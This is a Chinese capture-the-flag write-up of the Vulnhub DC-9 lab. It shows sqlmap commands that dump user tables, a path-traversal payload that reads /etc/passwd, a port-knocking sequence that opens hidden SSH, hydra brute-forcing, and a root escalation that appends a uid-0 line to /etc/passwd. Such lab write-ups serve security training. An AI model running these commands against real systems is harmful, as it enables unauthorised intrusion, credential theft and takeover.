IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> Vulnhub | DC: 9 |【实战】 -> 正文阅读

[PHP知识库]Vulnhub | DC: 9 |【实战】

写在前面

靶场链接:
https://www.vulnhub.com/entry/dc-9,412/

DC系列,有些知识点在DC:1中提到,可以翻阅

DC:1

恭喜你,DC_9是DC系列的最后一个靶场,你已经刷完DC系列了,推荐你看最后的DC篇总结。

信息收集

这里省略了网段扫描,直接对目标进行端口扫描。

ip: 192.168.101.39
port: 80

在这里插入图片描述
进去看看,一开始就提示从上面功能栏中选择一栏,总共四栏。

对应路径分别为:

/index.php
/display.php
/search.php
/manage.php

如下四图

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

寻找突破点

前两个就是信息的展示,后两个有输入点,抓包查看这两个点。

登录点。输入是明文传输,无验证码,有爆破的机会,同时前面页面有员工信息泄露,可以制作社工字典针对型爆破。不过爆破是没有办法的时候再来尝试了,先看看另一个点
在这里插入图片描述
简单的sql测试,成功了,这里显然是突破点。

在这里插入图片描述
继续尝试一些其他语句。

探测列数
在这里插入图片描述

确定回显位
在这里插入图片描述

SQL注入

已经非常明显了,使用工具,就不手工攻击了。记得将数据包存入一个文本文件,这里就是存为hack.txt,加上-r参数即可

sqlmap -r hack.txt

在这里插入图片描述
继续查询

sqlmap -r hack.txt --current-db

在这里插入图片描述
查到目标点

sqlmap -r hack.txt -D Staff -T Users -dump

在这里插入图片描述
随便找一个破解试试
在这里插入图片描述
得到账号密码。

admin
transorbital1

登录成功,新开了两个栏,点进去没什么东西,下方提示

file does not exist

如果看过前面的dc系列,在dc5中也有爆破本地文件包含参数进行攻击的思路。需要一些经验和猜测吧
在这里插入图片描述

文件包含

推断可能为本地包含点,爆破参数名和包含文件。
在这里插入图片描述
找到

file为参数,简单做目录穿越就可以攻击了
在这里插入图片描述

网页表现
在这里插入图片描述
尝试查看其他敏感文件。注意这里payload比一般的往上多了一级,因为探测的时候就需要往上一级才是当前网页(index.php)加载路径

?file=../../../../etc/passwd

在这里插入图片描述
其实到这里,你是否觉得和dc5非常相似,也是本地文件包含,那么我用一样的思路不就行了么?

日志写马,是本地文件包含的惯用手法,只是现在是apache,之前是nginx

查看日志路径(可能被修改过)

?file=../../../../etc/apache2/apache2.conf

在这里插入图片描述
从源代码看看,是在一个变量后面。
在这里插入图片描述
继续跟进

/etc/apache2/envvars

在这里插入图片描述
查询access.logerror.log 无果。

在这里插入图片描述
应该是关了

隐藏SSH

似乎到这里思路就断了。这个靶机感觉怪怪的,因为以往的靶机至少都会开放8022端口,但是这个靶机扫描结果没有22端口,工作者难以对目标网站进行维护。

这里就是隐藏SSH技术。先说说ssh安全,这里先简单介绍一些ssh防御方法

这里暂不讨论ssh本身缺陷的防御(及时更新,及时打补丁…),仅从能动性防御角度触发

定期修改ssh密码,或使用证书登录
修改ssh端口
修改ssh配置,设置登录时长,错误尝试次数

上述的方法,其实都有绕过和攻击的空间,较为安全的就是knockd工具,它可以和防火墙联合工作,只有正确“敲门”,去连接相应的端口序列,才能打开22端口

这样做,有类似一次一密的保护,同时隐藏了ssh的指纹。

knockd具体工作方式:https://blog.csdn.net/nzjdsds/article/details/112476120

首先查询当前任务调度:
在这里插入图片描述
从源码看再ctrl+f一下
在这里插入图片描述
查看knockd的配置文件 /etc/knockd.conf
在这里插入图片描述
查看源代码
在这里插入图片描述
得到敲门序列

7469,8475,9842

这里建议下载knockd工具,直接使用自带的knock,一键敲门

knock 192.168.101.39 7469:tcp 8475:tcp 9842:tcp

使用nmap也可以:

for x in 7469,8475,9842; do nmap -Pn --max-retries 0 -p $x 192.168.101.39; done

敲门后再次扫描,找到ssh端口
在这里插入图片描述
进入ssh,利用前面的sql点,查出所有敏感数据

sqlmap -r hack.txt -D users -T UserDetails -dump

在这里插入图片描述
将上述提到的密码和用户名制作为字典,使用hydra破解即可
在这里插入图片描述
得到三个用户密码,令人激动,上去看看。

这里其实设计的不是很好,三个用户基本一样,suid文件无差异,就藏了一个线索在其中一个用户中。就只能慢慢找。

suid无差异
在这里插入图片描述
在这里插入图片描述
查大家的文件
在这里插入图片描述
终于在janitor用户下,找到一个隐藏密码本
在这里插入图片描述
重新制为字典,再次爆破
在这里插入图片描述
出现两个用户,再查
在这里插入图片描述
有一个test文件,运行时提示有test.py
在这里插入图片描述
find一下 test.py

find / -name test.py -print 2>/dev/null

在这里插入图片描述
代码审计一下
在这里插入图片描述
就是一个追加功能,先打开第一参数,再追加第二参数

权限提升

追加内容的攻击,我们在dc4中有遇到过,同样是追加 /etc/passwd 文件
在这里插入图片描述
这次写个密码,存至tmp目录下

echo 'sayo:$1$123456$F7kNUZuCbTjf7qCbQhTB21:0:0:root:/root:/bin/bash' > /tmp/hack
sudo ./test /tmp/hack /etc/passwd

在这里插入图片描述
登录
在这里插入图片描述
得到flag
在这里插入图片描述

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章           查看所有文章
加:2022-09-24 20:37:31  更:2022-09-24 20:38:07 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/15 1:36:12-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码